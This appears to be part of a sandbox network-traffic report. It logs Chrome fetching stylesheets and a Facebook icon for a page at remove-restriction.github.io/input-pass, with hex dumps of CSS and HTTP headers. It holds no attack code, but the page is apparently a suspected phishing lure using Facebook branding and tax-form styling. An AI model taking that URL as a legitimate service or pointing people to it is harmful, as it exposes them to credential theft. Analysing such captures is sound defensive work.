2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 65 62 6b 69 74 2d 61 75 74 6f 66 69 6c 6c 3a 66 6f 63 75 73 2c 0d 0a 73 65 6c 65 63 74 3a 2d 77 65 62 6b 69 74 2d 61 75 74 6f 66 69 6c 6c 2c 0d 0a 73 65 6c 65 63 74 3a 2d 77 65 62 6b 69 74 2d 61 75 74 6f 66 69 6c 6c 3a 68 6f 76 65 72 2c 0d 0a 73 65 6c 65 63 74 3a 2d 77 65 62 6b 69 74 2d 61 75 74 6f 66 69 6c 6c 3a 66 6f 63 75 73 20 7b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 70 78 20 31 30 30 30 70 78 20 23 46 46 46 46 46 46 20 69 6e 73 65 74 3b 0d 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 70 78 20 31 30 30 30 70 78 20 23 46 46 46 46 46 46 20 69 6e 73 65 74 3b 0d 0a 7d 0d 0a 0d 0a 2f 2a 20 52 65 6d 6f 76 65 20 61 6c 6c 20 61 6e 69 6d 61 74 69 6f 6e 73 20 61 6e 64 20 74 72 61 6e 73 69 74 69 6f Data Ascii: ebkit-autofill:focus,select:-webkit-autofill,select:-webkit-autofill:hover,select:-webkit-autofill:focus { -webkit-box-shadow: 0 0 0px 1000px #FFFFFF inset; box-shadow: 0 0 0px 1000px #FFFFFF inset;}/* Remove all animations and transitio
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 72 2d 62 6f 64 79 2d 62 61 63 6b 67 72 6f 75 6e 64 29 3b 0d 0a 0d 0a 20 20 2f 2a 20 64 69 76 69 64 69 6e 67 20 6c 69 6e 65 20 6f 6e 20 74 6f 70 20 6f 66 20 69 6e 74 65 72 76 69 65 77 20 71 75 65 73 74 69 6f 6e 2e 20 2a 2f 0d 0a 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 30 2e 30 36 32 35 72 65 6d 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 2d 62 6f 72 64 65 72 29 3b 0d 0a 7d 0d 0a 0d 0a 23 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 72 65 6d 3b 0d 0a 7d 0d 0a 0d 0a 2f 2a 20 43 61 70 74 69 6f 6e 20 49 48 6f 76 65 72 20 2a 2f 0d 0a 2e 49 6e 66 6f 49 63 6f 6e 53 76 67 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 20 3a 20 30 2e 35 72 65 6d 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 Data Ascii: r-body-background); /* dividing line on top of interview question. / border-top: 0.0625rem solid var(--color-container-border);}#footer { margin-top: 4rem;}/ Caption IHover */.InfoIconSvg { margin-top : 0.5rem; font-size:
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 3d 27 31 27 20 66 69 6c 6c 3d 27 6e 6f 6e 65 27 20 66 69 6c 6c 2d 72 75 6c 65 3d 27 65 76 65 6e 6f 64 64 27 25 33 45 25 33 43 67 20 69 64 3d 27 53 74 65 70 2d 31 2d 43 6f 70 79 27 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 2d 38 32 30 2e 30 30 30 30 30 30 2c 20 2d 34 30 35 2e 30 30 30 30 30 30 29 27 25 33 45 25 33 43 67 20 69 64 3d 27 47 72 6f 75 70 27 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 33 36 37 2e 30 30 30 30 30 30 2c 20 33 37 38 2e 30 30 30 30 30 30 29 27 25 33 45 25 33 43 67 20 69 64 3d 27 43 4c 4f 53 45 2d 43 6f 70 79 2d 32 27 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 34 34 38 2e 30 30 30 30 30 30 2c 20 32 32 2e 30 30 30 30 30 30 29 27 25 33 45 25 33 43 6d 61 73 6b 20 69 64 Data Ascii: ='1' fill='none' fill-rule='evenodd'%3E%3Cg id='Step-1-Copy' transform='translate(-820.000000, -405.000000)'%3E%3Cg id='Group' transform='translate(367.000000, 378.000000)'%3E%3Cg id='CLOSE-Copy-2' transform='translate(448.000000, 22.000000)'%3E%3Cmask id
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 3a 20 72 6f 74 61 74 65 28 2d 31 33 35 64 65 67 29 3b 0d 0a 7d 0d 0a 0d 0a 2e 49 68 6f 76 65 72 49 6e 66 6f 43 6c 61 73 73 2e 70 6f 70 6f 76 65 72 2d 74 6f 70 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 30 2e 35 72 65 6d 3b 0d 0a 7d 0d 0a 0d 0a 2e 49 68 6f 76 65 72 49 6e 66 6f 43 6c 61 73 73 2e 70 6f 70 6f 76 65 72 2d 74 6f 70 3a 61 66 74 65 72 20 7b 0d 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 27 27 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 62 6f 74 74 6f 6d 3a 20 2d 30 2e 34 72 65 6d 3b 0d 0a 20 20 6c 65 66 74 3a 20 31 72 65 6d 3b 0d 0a 20 20 77 69 64 74 68 3a 20 30 2e 37 35 72 65 6d 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 30 2e 37 35 72 65 6d 3b 0d 0a Data Ascii: : rotate(-135deg);}.IhoverInfoClass.popover-top{ margin-top: -0.5rem;}.IhoverInfoClass.popover-top:after { content: ''; display: block; position: absolute; bottom: -0.4rem; left: 1rem; width: 0.75rem; height: 0.75rem;
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 2e 35 72 65 6d 3b 0d 0a 7d 0d 0a 0d 0a 2e 42 61 63 6b 41 72 72 6f 77 54 65 78 74 20 73 70 61 6e 20 7b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 65 6d 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0d 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 32 35 3b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 7d 0d 0a 0d 0a 2f 2a 20 45 72 72 6f 72 20 61 6e 64 20 4d 69 6e 69 20 46 6f 6e 74 73 20 2a 2f 0d 0a 2e 4d 69 6e 69 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 0d 0a 20 20 63 6f Data Ascii: justify-content: center; align-items: center; height: 1.5rem;}.BackArrowText span { height: 1em; font-size: 1em; line-height: 1.25; margin: 0; padding: 0;}/* Error and Mini Fonts */.Mini { font-size: 0.875rem; co
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 32 2c 31 36 20 30 2c 31 32 2e 34 31 38 32 37 38 20 30 2c 38 20 43 30 2c 33 2e 35 38 31 37 32 32 20 33 2e 35 38 31 37 32 32 2c 30 20 38 2c 30 20 5a 20 4d 38 2c 32 20 43 34 2e 36 38 36 32 39 31 35 2c 32 20 32 2c 34 2e 36 38 36 32 39 31 35 20 32 2c 38 20 43 32 2c 31 31 2e 33 31 33 37 30 38 35 20 34 2e 36 38 36 32 39 31 35 2c 31 34 20 38 2c 31 34 20 43 31 31 2e 33 31 33 37 30 38 35 2c 31 34 20 31 34 2c 31 31 2e 33 31 33 37 30 38 35 20 31 34 2c 38 20 43 31 34 2c 34 2e 36 38 36 32 39 31 35 20 31 31 2e 33 31 33 37 30 38 35 2c 32 20 38 2c 32 20 5a 20 4d 39 2c 37 20 4c 39 2c 31 30 20 4c 31 30 2c 31 30 20 4c 31 30 2c 31 32 20 4c 36 2c 31 32 20 4c 36 2c 31 30 20 4c 37 2c 31 30 20 4c 37 2c 39 20 4c 36 2c 39 20 4c 36 2c 37 20 4c 39 2c 37 20 5a 20 4d 39 2c 34 20 4c 39 Data Ascii: 2,16 0,12.418278 0,8 C0,3.581722 3.581722,0 8,0 Z M8,2 C4.6862915,2 2,4.6862915 2,8 C2,11.3137085 4.6862915,14 8,14 C11.3137085,14 14,11.3137085 14,8 C14,4.6862915 11.3137085,2 8,2 Z M9,7 L9,10 L10,10 L10,12 L6,12 L6,10 L7,10 L7,9 L6,9 L6,7 L9,7 Z M9,4 L9
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 6e 6e 65 72 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 0d 0a 0d 0a 2e 43 61 4e 75 6d 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 35 30 72 65 6d 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 53 46 50 72 6f 54 65 78 74 2d 4d 65 64 69 75 6d 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 36 35 36 37 36 62 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 70 78 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 2e 35 72 65 6d 3b 0d 0a 7d 0d 0a 0d 0a 2e 41 Data Ascii: nner{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}.CaNum { font-size: 0.850rem; font-family: SFProText-Medium, Helvetica, Arial, sans-serif; color: #65676b; font-weight: 600; margin-left: 3px; margin-top: 0.5rem;}.A
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 2f 2a 20 43 61 70 74 69 6f 6e 20 54 65 78 74 2a 2f 0d 0a 2e 43 61 70 74 69 6f 6e 20 2e 4a 75 73 74 54 65 78 74 20 2e 43 61 70 74 69 6f 6e 20 7b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 7d 0d 0a 0d 0a 2e 43 61 70 74 69 6f 6e 57 72 61 70 70 65 72 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 6f 74 74 6f 6d 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 72 65 6d 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 66 6c 65 78 2d 73 74 61 72 74 3b 0d 0a 7d 0d 0a Data Ascii: 0px !important;}/* Caption Text*/.Caption .JustText .Caption { font-weight: 700;}.CaptionWrapper { display: flex; vertical-align: bottom; margin-top: 1rem; font-weight: 500; font-size: 14px; align-items: flex-start;}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49746	185.199.108.153	443	6036	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-06 00:42:06 UTC	590	OUT	GET /input-pass/interview.css HTTP/1.1 Host: remove-restriction.github.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://remove-restriction.github.io/input-pass/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-06 00:42:06 UTC	753	IN	HTTP/1.1 200 OK Connection: close Content-Length: 10524 Server: GitHub.com Content-Type: text/css; charset=utf-8 permissions-policy: interest-cohort=() x-origin-cache: HIT Last-Modified: Mon, 18 Mar 2024 21:31:19 GMT Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=31556952 ETag: "65f8b2a7-291c" expires: Thu, 06 Feb 2025 00:52:06 GMT Cache-Control: max-age=600 x-proxy-cache: MISS X-GitHub-Request-Id: 5758:C95D3:D6B4BB:EC309A:67A4055E Accept-Ranges: bytes Age: 0 Date: Thu, 06 Feb 2025 00:42:06 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740064-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1738802527.535458,VS0,VE17 Vary: Accept-Encoding X-Fastly-Request-ID: 0c58de68fe8faa75f1c00696efa11c640740f1fa
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 2e 49 73 48 69 64 64 65 6e 2c 20 2e 49 6e 76 69 73 69 62 6c 65 2c 20 2e 48 69 64 64 65 6e 2c 20 2e 48 69 64 64 65 6e 47 72 6f 75 70 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 0d 0a 2e 45 72 72 6f 72 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 7d 0d 0a 0d 0a 2e 42 61 63 6b 41 72 72 6f 77 54 65 78 74 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 0d 0a 2e 6e 6f 2d 73 63 72 6f 6c 6c 20 7b 0d 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 Data Ascii: .IsHidden, .Invisible, .Hidden, .HiddenGroup { display: none !important;}.error-message { display: none;}.Error .error-message{ display: inherit;}.BackArrowText { display: none;}.no-scroll { overflow: hidde
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 64 69 6e 67 3a 20 31 32 70 78 20 30 20 35 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 6b 31 30 39 39 5f 77 39 46 6f 72 6d 20 23 6b 31 30 39 39 5f 63 6c 61 73 73 42 6f 78 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 7d 0d 0a 0d 0a 2e 6b 31 30 39 39 5f 77 39 46 6f 72 6d 20 23 6b 31 30 39 39 5f 63 6c 61 73 73 42 6f 78 20 75 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 20 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 0d 0a 2e 6b 31 30 39 39 5f 77 39 46 6f 72 6d 20 23 6b 31 30 39 39 5f 63 Data Ascii: ding: 12px 0 5px;}.k1099_w9Form #k1099_classBox { padding-top: 12px; position: relative;}.k1099_w9Form #k1099_classBox ul { margin: 0; padding: 0; list-style-type: none;}.k1099_w9Form #k1099_c
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 20 23 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 35 70 78 20 35 70 78 20 35 70 78 20 30 70 78 3b 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 7d 0d 0a 0d 0a 2e 6b 31 30 39 39 5f 77 39 46 6f 72 6d 20 2e 6b 31 30 39 39 5f 68 64 72 52 6f 77 20 2e 6b 31 30 39 39 5f 70 61 72 74 4e 75 6d 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 35 70 78 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 Data Ascii: #333; font-weight: bold; padding: 5px 5px 5px 0px;; font-size: 14px; position: relative;}.k1099_w9Form .k1099_hdrRow .k1099_partNum { padding: 5px 10px; background-color: #333; color: #
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 6d 6f 62 69 6c 65 20 23 6b 31 30 39 39 5f 77 38 48 65 61 64 31 2c 20 2e 6d 6f 62 69 6c 65 20 23 6b 31 30 39 39 5f 77 38 48 65 61 64 32 2c 20 2e 6d 6f 62 69 6c 65 20 2e 6b 31 30 39 39 5f 61 31 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 6d 6f 62 69 6c 65 20 2e 6b 31 30 39 39 5f 61 32 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 Data Ascii: clear: both !important; } .mobile #k1099_w8Head1, .mobile #k1099_w8Head2, .mobile .k1099_a1, .mobile .k1099_a2 { width: 100% !important; border-right: none !important;
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 6d 6f 62 69 6c 65 20 2e 6b 31 30 39 39 5f 77 69 64 74 68 38 30 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 7d 0d 0a 0d 0a 2e 6b 31 30 39 39 5f 77 39 46 6f 72 6d 20 2e 6b 31 30 39 39 5f 68 64 72 52 6f 77 20 2e 6b 31 30 39 39 5f 70 61 72 74 4e 75 6d 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 73 74 61 74 69 63 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 2e 6b 31 30 39 39 5f 77 39 46 6f 72 6d 20 2e 6b 31 30 39 39 5f 73 69 67 6e 61 74 75 72 65 52 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0d 0a 20 20 20 Data Ascii: t; } .mobile .k1099_width80 { width: 100% !important; }}.k1099_w9Form .k1099_hdrRow .k1099_partNum { position: static !important;}.k1099_w9Form .k1099_signatureRow { margin: 5px;
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 0d 0a 2e 73 65 63 6f 6e 64 2d 63 6f 6c 75 6d 6e 2d 73 69 6d 70 6c 69 66 69 65 64 2d 69 6e 74 65 72 76 69 65 77 20 2e 6b 31 30 39 39 5f 63 68 65 63 6b 62 6f 78 43 6f 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 2e 73 65 63 6f 6e 64 2d 63 6f 6c 75 6d 6e 2d 73 69 6d 70 6c 69 66 69 65 64 2d 69 6e 74 65 72 76 69 65 77 20 23 6b 31 30 39 39 5f 63 63 6f 72 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 2e 73 65 63 6f 6e 64 2d 63 6f 6c 75 6d 6e 2d 73 69 6d 70 6c 69 66 69 65 64 2d 69 6e 74 65 72 76 69 65 77 20 23 6b Data Ascii: .second-column-simplified-interview .k1099_checkboxCol { width: 100% !important; clear: both !important;}.second-column-simplified-interview #k1099_ccorp { clear: both !important;}.second-column-simplified-interview #k
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 39 39 5f 65 73 74 61 74 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 2e 73 65 63 6f 6e 64 2d 63 6f 6c 75 6d 6e 2d 73 69 6d 70 6c 69 66 69 65 64 2d 69 6e 74 65 72 76 69 65 77 20 2e 6b 31 30 39 39 5f 77 39 46 6f 72 6d 20 2e 6b 31 30 39 39 5f 68 64 72 52 6f 77 20 2e 6b 31 30 39 39 5f 70 61 72 74 4e 75 6d 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 73 74 61 74 69 63 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 2e 73 65 63 6f 6e 64 2d 63 6f 6c 75 6d 6e 2d 73 69 6d 70 6c 69 66 69 65 64 2d 69 6e 74 65 72 76 69 65 77 20 23 6b 31 30 39 39 5f 73 69 67 6e 61 74 75 72 65 44 61 74 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 20 21 69 6d Data Ascii: 99_estate { clear: both !important;}.second-column-simplified-interview .k1099_w9Form .k1099_hdrRow .k1099_partNum { position: static !important;}.second-column-simplified-interview #k1099_signatureDate { width: 100% !im
2025-02-06 00:42:06 UTC	878	IN	Data Raw: 0a 7d 0d 0a 2e 73 65 63 6f 6e 64 2d 63 6f 6c 75 6d 6e 2d 73 69 6d 70 6c 69 66 69 65 64 2d 69 6e 74 65 72 76 69 65 77 20 2e 6b 31 30 39 39 5f 77 69 64 74 68 36 30 20 7b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 2e 73 65 63 6f 6e 64 2d 63 6f 6c 75 6d 6e 2d 73 69 6d 70 6c 69 66 69 65 64 2d 69 6e 74 65 72 76 69 65 77 20 2e 6b 31 30 39 39 5f 77 69 64 74 68 38 30 20 7b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 2e 73 65 63 6f 6e 64 2d 63 6f 6c 75 6d 6e 2d 73 69 6d 70 6c 69 66 69 65 64 2d 69 6e 74 65 72 76 69 65 77 20 2e 6b 31 30 39 39 5f 63 68 65 63 6b 62 6f 78 43 6f 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 77 68 69 74 65 2d Data Ascii: }.second-column-simplified-interview .k1099_width60 { width: 100% !important;}.second-column-simplified-interview .k1099_width80 { width:100% !important;}.second-column-simplified-interview .k1099_checkboxCol { white-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	157.240.0.35	443	6036	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-06 00:42:06 UTC	614	OUT	GET /images/fb_icon_325x325.png HTTP/1.1 Host: www.facebook.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://remove-restriction.github.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-06 00:42:06 UTC	1102	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * content-md5: d/aqJ+1Jz8Ok1Z9NYiYbVg== Edge-Control: cache-maxage=86400s Expires: Fri, 07 Feb 2025 00:03:14 GMT Cache-Control: public,max-age=86400 reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/" report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"} document-policy: force-load-at-top
2025-02-06 00:42:06 UTC	1464	IN	Data Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
